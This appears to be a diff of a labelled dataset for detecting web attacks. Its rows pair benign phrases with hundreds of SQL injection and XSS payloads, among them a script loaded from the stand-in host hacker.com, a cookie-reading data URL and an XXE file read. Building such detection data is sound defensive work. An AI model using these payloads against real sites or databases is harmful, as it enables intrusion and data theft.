--",2,SQLi,21105 -<script>navigation.navigate('javascript:alert(1)')</script>,1,XSS,170 -"1"" union all select null--",2,SQLi,16566 -1'+ ( select bfeq where 3445 = 3445 and 9198 = 9198--,2,SQLi,22075 -Select the right colors for the design.,0,normal,24389 -1'+ ( select kzgg where 5070 = 5070,2,SQLi,18933 --9622' ) ) ) order by 1#,2,SQLi,13964 -1 ) rlike sleep ( 5 ),2,SQLi,19331 -"1"" where 5062 = 5062",2,SQLi,19568 -&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;,1,XSS,1513 -"b=""URL(\"""";",1,XSS,2800 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><summary id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></summary>",1,XSS,6965 -"1 ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 7182 = 7182",2,SQLi,21549 -<script\x09>javascript:alert(1)</script>,1,XSS,564 -Select knife.,0,normal,24712 -Where's the mental health clinic?,0,normal,23847 -"{""id"":null,""name"":""Ophanimon""}",0,normal,25422 -"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xee;</foo>",1,XSS,1648 -"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) ||'",2,SQLi,14820 -<image2 onpointerup=alert(1)>XSS</image2>,1,XSS,5917 -"1' in boolean mode ) union all select null,null,null,null#",2,SQLi,17617 -<label onpointermove=alert(1)>XSS</label>,1,XSS,8157 -"-4637"" where 8354 = 8354 or 1186 = 2714--",2,SQLi,16258 -"1' ) as siyk where 1514 = 1514 union all select null,null,null,null,null,null#",2,SQLi,13486 -"<blockquote onpaste=""alert(1)"" contenteditable>test</blockquote>",1,XSS,8541 -Let's choose a recipe for Sunday brunch.,0,normal,24142 -Check values where possible.,0,normal,23563 -"1"" where 8234 = 8234",2,SQLi,20400 -"She asked, ""Why is my phone slow?""",0,normal,23134 -"1%"" ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ""%"" = """,2,SQLi,16500 -"1' ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( 'pcim' = 'pcim",2,SQLi,14654 -"1'|| ( select 'rawn' from dual where 4988 = 4988 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) ) ||'",2,SQLi,12199 -Select your dream wedding makeup.,0,normal,24569 -"<canvas draggable=""true"" ondragleave=""alert(1)"">test</canvas>",1,XSS,7398 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8",2,SQLi,10631 -"1"" ) as dlfq where 8410 = 8410",2,SQLi,18730 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) -- mmjk,2,SQLi,21220 -"<div draggable=""true"" contenteditable>drag me</div><i ondragover=alert(1) contenteditable>drop here</i>",1,XSS,8519 -"Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>",1,XSS,9356 -"-3250%"" union all select 7162,7162,7162,7162,7162,7162,7162,7162,7162--",2,SQLi,19575 -She chose a menu for the dinner party from the chef.,0,normal,23944 -?,2,SQLi,10205 -1' where 2958 = 2958,2,SQLi,21406 -"1"" and elt ( 1210 = 1210,sleep ( 5 ) ) and ""phcl"" like ""phcl",2,SQLi,20965 -"1"" ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ""mjkl"" = ""mjkl",2,SQLi,19780 --9893' or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'pbop' = 'pbop,2,SQLi,18366 -&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;,1,XSS,1338 -<map id=x tabindex=1 onbeforeactivate=alert(1)></map>,1,XSS,3257 -Select the perfect proposal spot.,0,normal,24547 -"<iframe onLoad iframe onLoad=""javascript:javascript:alert(1)""></iframe onLoad>",1,XSS,352 -"<XML ID=""xss""><I><B>&lt;IMG SRC=""javas<!-- -->cript:alert('XSS')""&gt;</B></I></XML>",1,XSS,9813 -<image2 onpointerenter=alert(1)>XSS</image2>,1,XSS,8389 -"1%"" ) ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,20615 -1' ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,17014 -Select the best course.,0,normal,24526 -"<style>:target {color: red;}</style><thead id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></thead>",1,XSS,6336 --9562' or 8571 = 8571--,2,SQLi,20229 -"<form onmouseout=""alert(1)"">test</form>",1,XSS,3296 -"<pre draggable=""true"" ondragstart=""alert(1)"">test</pre>",1,XSS,4942 -"1' ) where 6387 = 6387 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,19864 -"<style>:target {color: red;}</style><data id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></data>",1,XSS,7528 -"<th draggable=""true"" ondragleave=""alert(1)"">test</th>",1,XSS,6468 -"<wbr onmouseover=""alert(1)"">test</wbr>",1,XSS,4016 -"1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,17448 -<iframe// src=javaSCRIPT&colon;alert(1),1,XSS,1214 -Select teach.,0,normal,24894 -"{""id"":null,""name"":""Megidramon""}",0,normal,25547 -Delete the data.,0,normal,23011 -1 ) where 2232 = 2232,2,SQLi,12701 -"<style>:target {color:red;}</style><noembed id=x style=""transition:color 1s"" ontransitionend=alert(1)></noembed>",1,XSS,4418 -<wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><input id=y autofocus>,1,XSS,6101 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( ""vcvb"" like ""vcvb",2,SQLi,14373 -<map onpointerdown=alert(1)>XSS</map>,1,XSS,6382 -Insert code.,0,normal,23240 -></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder=0%EF%BB%BF,1,XSS,1200 -I need to select the right tools for the job.,0,normal,23923 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28",2,SQLi,10563 -"1' ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( 'skdy' = 'skdy",2,SQLi,16873 -<canvas onpointerover=alert(1)>XSS</canvas>,1,XSS,2948 -admin' or '1' = '1,2,SQLi,11504 -1'|| ( select 'hshf' where 9073 = 9073 and 7533 = 7533 ) ||',2,SQLi,17539 -"<tfoot onmouseup=""alert(1)"">test</tfoot>",1,XSS,4630 -1 ) as qort where 1554 = 1554,2,SQLi,17955 -"1"" or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ""pnub"" = ""pnub",2,SQLi,16211 -"{""id"":null,""firstName"":""Elisa"",""lastName"":""Mak"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25480 -"1' ) as ekjw where 5477 = 5477 union all select null,null,null,null,null--",2,SQLi,12236 -"end and ( ( ( ""zpii"" like ""zpii",2,SQLi,13915 -"1' ) where 3271 = 3271 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,17795 -Select carefully now.,0,normal,24982 -"<col onpaste=""alert(1)"" contenteditable>test</col>",1,XSS,7654 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--",2,SQLi,10721 -"<menu onmousedown=""alert(1)"">test</menu>",1,XSS,8542 -"1"" ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",2,SQLi,19834 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'jxqf' like 'jxqf",2,SQLi,21067 -"ORDER BY 1,SLEEP(5)#",2,SQLi,10478 -Select your words.,0,normal,24991 -<input onpointerleave=alert(1)>XSS</input>,1,XSS,2910 -"-9721' or elt ( 9511 = 9238,9238 )",2,SQLi,17936 -"<address onbeforecopy=""alert(1)"" contenteditable>test</address>",1,XSS,8547 -"1', ( select ( case when ( 3902 = 3902 ) then ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) else 1/ ( select 0 from dual ) end ) from dual )",2,SQLi,13769 -1'|| ( select 'homm' where 4937 = 4937 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,16344 -I'll select my groomsmen.,0,normal,24556 -"1 and elt ( 2770 = 3669,3669 ) # sfls",2,SQLi,15415 -Specify filters where valid.,0,normal,23515 -"1"" ) ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,19158 -"-8557 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,18828 -"-8600"" or elt ( 1032 = 1032,3623 ) and ""kfsn"" like ""kfsn",2,SQLi,18322 -"1"" ) ) or sleep ( 5 ) and ( ( ""mcyv"" = ""mcyv",2,SQLi,16371 -"select * from users where id = 1 or 1#""$ union select version ( ) ,version ( ) -- 1",2,SQLi,12008 -"-3283 ) where 1948 = 1948 union all select 1948,1948,1948#",2,SQLi,17783 -"<img src=""Mario Heiderich says that svg SHOULD not be executed trough image tags"" onerror=""javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');""></img>",1,XSS,1303 -"-5524 ) as eoyk where 6928 = 6928 union all select 6928,6928,6928,6928,6928,6928,6928,6928,6928--",2,SQLi,13403 -Sort the wires.,0,normal,23005 -Select your championship.,0,normal,25109 -"-4453' ) ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 'boxt' = 'boxt",2,SQLi,14822 -/*,2,SQLi,10014 -"1%' ) ) union all select null,null,null#",2,SQLi,16731 -<datalist onpointermove=alert(1)>XSS</datalist>,1,XSS,5454 -"-5644"" ) ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ( ""evcf"" = ""evcf",2,SQLi,13311 -<svg><table onload=alert(1)></table>,1,XSS,2913 -"<div draggable=""true"" contenteditable>drag me</div><h1 ondragover=alert(1) contenteditable>drop here</h1>",1,XSS,2795 -<i id=x tabindex=1 onactivate=alert(1)></i>,1,XSS,6546 -"1%"" ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ""%"" = """,2,SQLi,15294 -"1"" ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ""tbdl"" like ""tbdl",2,SQLi,15438 -"<style>:target {color:red;}</style><script id=x style=""transition:color 1s"" ontransitionend=alert(1)></script>",1,XSS,8310 -<xss id=x tabindex=1 onfocus=alert(1)></xss>,1,XSS,3663 -"<a href="" javascript:alert(1)"">XSS</a>",1,XSS,148 -"{""id"":null,""firstName"":""Tu"",""lastName"":""Weile"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25972 -Modify account.,0,normal,23224 -<code id=x tabindex=1 onfocusin=alert(1)></code>,1,XSS,8351 -<svg><footer onload=alert(1)></footer>,1,XSS,6845 -Order a margherita pizza.,0,normal,22874 -"-8382"" ) ) order by 1--",2,SQLi,15082 --7758%' ) ) ) or 3038 = 3038,2,SQLi,12875 -"<object id=""x"" classid=""clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598""></object> <object classid=""clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"" onqt_error=""javascript:alert(1)"" style=""behavior:url(#x);""><param name=postdomevents /></object>",1,XSS,649 -"select * from users where id = '1' *1 union select 1,banner from v$version where rownum = 1 -- 1'",2,SQLi,12124 -primary,0,normal,23318 -Let's choose a location for our gathering.,0,normal,24149 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dir id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></dir>",1,XSS,7736 -1'+ ( select 'vidl' where 9445 = 9445 and 5498 = 5777#,2,SQLi,17398 -""" or """"&""",2,SQLi,11812 -"<style>@keyframes x{}</style><u style=""animation-name:x"" onanimationend=""alert(1)""></u>",1,XSS,5919 -"<div draggable=""true"" contenteditable>drag me</div><footer ondrop=alert(1) contenteditable>drop here</footer>",1,XSS,6133 -<content id=x tabindex=1 ondeactivate=alert(1)></content><input id=y autofocus>,1,XSS,6761 -"1"" ) ) as ubrg where 7318 = 7318 and 7331 = 6529--",2,SQLi,18181 -"1"" ) as eoer where 8667 = 8667 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --",2,SQLi,21482 -"<rtc onbeforepaste=""alert(1)"" contenteditable>test</rtc>",1,XSS,7746 -1'+ ( select hett where 7228 = 7228,2,SQLi,20143 -"-8159 where 2793 = 2793 union all select 2793,2793,2793,2793,2793#",2,SQLi,19583 -SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>,1,XSS,9357 -"1%"" ) ) waitfor delay '0:0:5' and ( ( ""%"" = """,2,SQLi,13888 -"<big draggable=""true"" ondragenter=""alert(1)"">test</big>",1,XSS,7577 -"<s onmousedown=""alert(1)"">test</s>",1,XSS,1723 -1' ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ),2,SQLi,20068 -select ( case when ( 6179 = 8476 ) then 6179 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,19686 -<small onpointerdown=alert(1)>XSS</small>,1,XSS,2494 -"<script>throw{},onerror=Uncaught=eval,h=location.hash,e={lineNumber:1,columnNumber:1,fileName:0,message:h[2]+h[1]+h},!!window.InstallTrigger?e:e.message</script>",1,XSS,128 -"<option draggable=""true"" ondragend=""alert(1)"">test</option>",1,XSS,6505 -"1"" ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ( ""uisi"" = ""uisi",2,SQLi,13216 -Create a captivating story about your travels.,0,normal,23095 -"1'qhfy<'"">utwq",2,SQLi,22311 -"<div draggable=""true"" contenteditable>drag me</div><body ondrop=alert(1) contenteditable>drop here</body>",1,XSS,6871 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( ( ""%"" = """,2,SQLi,20654 -"<map onbeforecopy=""alert(1)"" contenteditable>test</map>",1,XSS,7242 -"<multicol draggable=""true"" ondragleave=""alert(1)"">test</multicol>",1,XSS,7440 -"<header onmousedown=""alert(1)"">test</header>",1,XSS,4844 -select case when 6558 = 4327 then 1 else null end--,2,SQLi,12249 -"<bgsound onkeypress=""alert(1)"" contenteditable>test</bgsound>",1,XSS,8664 -"<cite onpaste=""alert(1)"" contenteditable>test</cite>",1,XSS,5867 --5350 ) ) or 9323 = 9323#,2,SQLi,13426 -Insert ink.,0,normal,23007 -"{""id"":null,""name"":""Butterfree""}",0,normal,25247 -"{""id"":null,""firstName"":""Ah Chai"",""lastName"":""Wong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25562 -Select download.,0,normal,24776 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ""poik"" = ""poik",2,SQLi,20259 -"<option draggable=""true"" ondragstart=""alert(1)"">test</option>",1,XSS,5886 -"1' ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( 'sqni' like 'sqni",2,SQLi,21554 -"-9263' ) as qodg where 6798 = 6798 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,21825 -"AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))",2,SQLi,10446 -Delete unnecessary files from your computer.,0,normal,23112 -"1'+ ( select dnxi where 5850 = 5850 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,21129 -Select the right solution for the puzzle.,0,normal,24330 -"<img src=""/"" =_="" title=""onerror='prompt(1)'"">",1,XSS,316 -<svg><del onload=alert(1)></del>,1,XSS,2727 -Where's your SQL information?,0,normal,23596 -"<div draggable=""true"" contenteditable>drag me</div><dd ondrop=alert(1) contenteditable>drop here</dd>",1,XSS,2482 -RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=',2,SQLi,10372 -1' where 8635 = 8635 order by 1--,2,SQLi,18641 -"1' in boolean mode ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) #",2,SQLi,21040 --5432' ) as dndq where 9633 = 9633 order by 1#,2,SQLi,15215 -"<template onkeydown=""alert(1)"" contenteditable>test</template>",1,XSS,2088 -Select your label.,0,normal,25077 -"<main onbeforepaste=""alert(1)"" contenteditable>test</main>",1,XSS,8822 -"1"" ) where 2070 = 2070",2,SQLi,21790 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><isindex id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></isindex>",1,XSS,4750 -"<center onbeforecut=""alert(1)"" contenteditable>test</center>",1,XSS,6236 -"javascript:/*""/*\""/*`/*'/**/ (alert())//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert()--><<svg/onload=alert()>",1,XSS,9545 -<area onpointerup=alert(1)>XSS</area>,1,XSS,6650 -<bdo onpointerleave=alert(1)>XSS</bdo>,1,XSS,6907 -Randomly select now.,0,normal,24963 -"1"" ) as ybkp where 7788 = 7788 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,18405 -"1' ) union all select null,null,null,null,null,null#",2,SQLi,13066 -"1 where 9279 = 9279 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,21225 -if ( 5896 = 4251 ) select 5896 else drop function xmyk--,2,SQLi,12983 -"1"" ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ""mhfc"" = ""mhfc",2,SQLi,19045 -1' and ( 5116 = 1602 ) *1602,2,SQLi,21074 -"-4605"" ) union all select 8542,8542,8542,8542,8542,8542,8542,8542--",2,SQLi,12247 +"-8002' ) ) ) union all select 6647,6647,6647--",2,SQLi,13428 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/* ++if(benchmark(3000000,MD5(1)),NULL,NULL))%20--",2,SQLi,22488 +<source id=x tabindex=1 onbeforedeactivate=alert(1)></source><input autofocus>,1,XSS,3740 +"document.getElementsByClassName("""").length",1,XSS,2435 +"-4280%"" ) ) ) union all select 7981,7981--",2,SQLi,16070 +"<bdi onkeypress=""alert(1)"" contenteditable>test</bdi>",1,XSS,4418 +"-1874"" ) as wgpj where 6481 = 6481 or 3629 = 3459",2,SQLi,22124 +"1 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) # zwck",2,SQLi,21133 +"<u draggable=""true"" ondragenter=""alert(1)"">test</u>",1,XSS,5812 +"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://hacker.com/xss.html"">",1,XSS,1306 +a' or 1=1--,2,SQLi,10042 +max,0,normal,23111 +"<hgroup onclick=""alert(1)"">test</hgroup>",1,XSS,5863 +<bdo onpointermove=alert(1)>XSS</bdo>,1,XSS,8307 +"-2962' ) ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 'hkjo' = 'hkjo",2,SQLi,15786 +"1' where 6721 = 6721 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,17368 +1 RLIKE SLEEP(5)-- 1337,2,SQLi,11141 +"<span onmouseover=""alert(1)"">test</span>",1,XSS,3694 +"ABC<div style=""x:\xE2\x80\x88expression(javascript:alert(1)"">DEF",1,XSS,458 +Where did you discover that inspiring story from?,0,normal,23720 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i",2,SQLi,11019 +<option id=x tabindex=1 onbeforeactivate=alert(1)></option>,1,XSS,4058 +"-4983%"" ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""%"" = """,2,SQLi,20896 +"<figure draggable=""true"" ondragleave=""alert(1)"">test</figure>",1,XSS,8353 +"<a href=""javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;""><button>",1,XSS,834 +<custom tags onpointermove=alert(1)>XSS</custom tags>,1,XSS,6913 +"<IMG SRC=x onpagehide=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1134 +"<SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>",1,XSS,9726 +"<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>",1,XSS,9215 +"1' ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 'kqip' like 'kqip",2,SQLi,15773 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*",2,SQLi,10854 +"1%"" ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ""%"" = """,2,SQLi,13610 +""")) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,10948 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT 